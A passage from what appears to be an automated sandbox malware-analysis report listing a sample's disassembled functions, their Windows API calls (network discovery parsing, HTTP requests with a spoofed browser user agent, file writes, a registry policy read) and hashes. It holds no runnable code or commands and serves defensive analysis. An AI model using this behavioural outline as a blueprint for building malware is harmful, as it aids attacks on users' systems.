                                                                                                                                    • Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                    Function 0040E310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                                    • Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                    • Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
                                                                                                                                    • Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                    • Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
                                                                                                                                    Function 0040F4B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
                                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F538
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F542
                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040F54D
                                                                                                                                    Strings
                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                    • API String ID: 2743515581-2960703779
                                                                                                                                    • Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                    • Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
                                                                                                                                    • Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                    • Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
                                                                                                                                    Function 0040BC70 Relevance: 12.1, APIs: 8, Instructions: 107fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
                                                                                                                                    • CreateFileW.KERNEL32(004163E0,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040BD92
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
                                                                                                                                      • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                      • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 439099756-0
                                                                                                                                    • Opcode ID: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                    • Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                    • Opcode Fuzzy Hash: 95b7ad4b48b2612a2ac74941d1961fd8d23959eee21eec156b7f746c57c5f411
                                                                                                                                    • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C
                                                                                                                                    Function 00405C00 Relevance: 12.1, APIs: 8, Instructions: 97fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
                                                                                                                                    • CreateFileW.KERNEL32(00415FC8,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405D15
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405D1F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3956458805-0
                                                                                                                                    • Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                    • Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
                                                                                                                                    • Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                    • Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99
                                                                                                                                    Function 004060A0 Relevance: 10.7, APIs: 7, Instructions: 176fileCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
                                                                                                                                    • memcpy.NTDLL(?,00000000,00000100), ref: 00406141
                                                                                                                                    • CreateFileW.KERNEL32(00415FC8,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 004062DD
                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1457358591-0
                                                                                                                                    • Opcode ID: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                    • Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
                                                                                                                                    • Opcode Fuzzy Hash: e72a487dce04114ef622edc0900d7397c89588e022fce289eeb1184eb778240f
                                                                                                                                    • Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9
                                                                                                                                    Function 0040ECC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: device$deviceType
                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                    • Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                    • Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
                                                                                                                                    • Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                    • Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95
                                                                                                                                    Function 0040EB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: service$serviceType
                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                    • Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                    • Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
                                                                                                                                    • Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                    • Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95
                                                                                                                                    Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                    • Opcode ID: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                    • Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
                                                                                                                                    • Opcode Fuzzy Hash: 3ac2f8f5af7b0d3c40b8ef892d708a394eff8d7b565022b2108cc4f7acf51177
                                                                                                                                    • Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9
                                                                                                                                    Function 0040ED01 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: device$deviceType
                                                                                                                                    • API String ID: 1602765415-3511266565
                                                                                                                                    • Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                    • Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
                                                                                                                                    • Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                    • Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
                                                                                                                                    Function 0040EBA1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                    • String ID: service$serviceType
                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                    • Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                    • Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
                                                                                                                                    • Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                    • Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
                                                                                                                                    Function 004077F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                    • String ID: %s%s
                                                                                                                                    • API String ID: 1447977647-3252725368
                                                                                                                                    • Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                    • Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
                                                                                                                                    • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                    Function 004063E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                    Strings
                                                                                                                                    • NoDrives, xrefs: 00406458
                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                    • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                    • API String ID: 2666887985-3471754645
                                                                                                                                    • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                    • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                    • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                    Function 0040DBE0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                      • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                      • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                    • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                    • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                    • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                    • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                    Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3488799664-0
                                                                                                                                    • Opcode ID: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                    • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                    • Opcode Fuzzy Hash: c4b67ad1fad57f8bcb632e0803aeb8977b8bb7c39f14d193e10d0355081e485a
                                                                                                                                    • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                    Function 00409860 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
